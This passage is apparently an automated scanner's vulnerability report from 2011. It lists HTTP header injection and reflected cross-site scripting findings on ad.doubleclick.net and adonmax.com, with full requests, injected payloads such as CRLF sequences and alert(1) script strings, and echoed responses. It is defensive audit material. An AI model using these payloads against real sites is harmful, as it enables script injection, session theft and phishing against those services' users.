/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820:
Date: Wed, 06 Jul 2011 14:01:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fae7%0d%0ae1ef4895d68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fae7%0d%0ae1ef4895d68/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fae7
e1ef4895d68
/N3285.google/B2343920.122;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 06 Jul 2011 11:56:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous  next
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439b8"-alert(1)-"4e414bdc8a7 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4883
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:56:12 GMT
Expires: Wed, 06 Jul 2011 11:56:12 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7https://www.lowermybills.com/lending/home-refinance/?sourceid=55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 7
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78e9e"-alert(1)-"df15dde4672 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
BCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "op
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f014"-alert(1)-"d85abfc7b06 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:56:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36475"-alert(1)-"4e6b3b90217 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
GZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b7d2"-alert(1)-"e1bf4c111b8 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4922
Date: Wed, 06 Jul 2011 11:56:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
ZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42744246");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b5"-alert(1)-"f722fd7d7a6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:33 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b3c/f/1d6/%2a/k%3B231248095%3B0-0%3B0%3B55400195%3B3454-728/90%3B42236289/42254076/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhz
...[SNIP]...

2.7. http://adonmax.com/afr.php [campaignid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The value of the campaignid request parameter is copied into the HTML document as plain text between tags. The payload d4501<script>alert(1)</script>6546b61c730 was submitted in the campaignid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
